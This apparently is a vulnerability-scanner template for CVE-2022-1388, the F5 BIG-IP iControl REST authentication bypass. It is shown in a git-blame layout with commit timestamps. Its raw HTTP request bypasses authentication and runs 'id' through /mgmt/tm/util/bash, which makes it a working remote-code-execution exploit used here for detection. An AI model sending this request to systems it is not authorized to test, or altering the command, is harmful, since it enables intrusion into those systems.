2022-05-09 07:53:05 +00:00
|
|
|
id: CVE-2022-1388
|
|
|
|
|
|
|
|
info:
|
|
|
|
name: F5 BIG-IP iControl REST Auth Bypass RCE
|
|
|
|
author: dwisiswant0
|
|
|
|
severity: critical
|
|
|
|
description: |
|
|
|
|
This vulnerability may allow an unauthenticated attacker
|
|
|
|
with network access to the BIG-IP system through the management
|
|
|
|
port and/or self IP addresses to execute arbitrary system commands,
|
|
|
|
create or delete files, or disable services. There is no data plane
|
|
|
|
exposure; this is a control plane issue only.
|
|
|
|
reference:
|
|
|
|
- https://support.f5.com/csp/article/K23605346
|
2022-05-09 08:36:32 +00:00
|
|
|
metadata:
|
|
|
|
verified-by: rootup
|
2022-05-09 07:53:05 +00:00
|
|
|
tags: bigip,cve,cve2022,rce,mirai
|
|
|
|
|
2022-05-09 08:36:32 +00:00
|
|
|
variables:
|
|
|
|
auth: "admin:"
|
|
|
|
|
2022-05-09 07:53:05 +00:00
|
|
|
requests:
|
|
|
|
- raw:
|
|
|
|
- |
|
|
|
|
POST /mgmt/tm/util/bash HTTP/1.1
|
|
|
|
Host: {{Hostname}}
|
|
|
|
Connection: keep-alive, X-F5-Auth-Token
|
|
|
|
X-F5-Auth-Token: a
|
2022-05-09 08:36:32 +00:00
|
|
|
Authorization: Basic {{base64(auth)}}
|
2022-05-09 07:53:05 +00:00
|
|
|
Content-Type: application/json
|
|
|
|
|
|
|
|
{
|
|
|
|
"command": "run",
|
|
|
|
"utilCmdArgs": "-c id"
|
|
|
|
}
|
|
|
|
matchers:
|
|
|
|
- type: word
|
|
|
|
words:
|
|
|
|
- "commandResult"
|
|
|
|
- "uid="
|
2022-05-09 08:36:32 +00:00
|
|
|
condition: and
|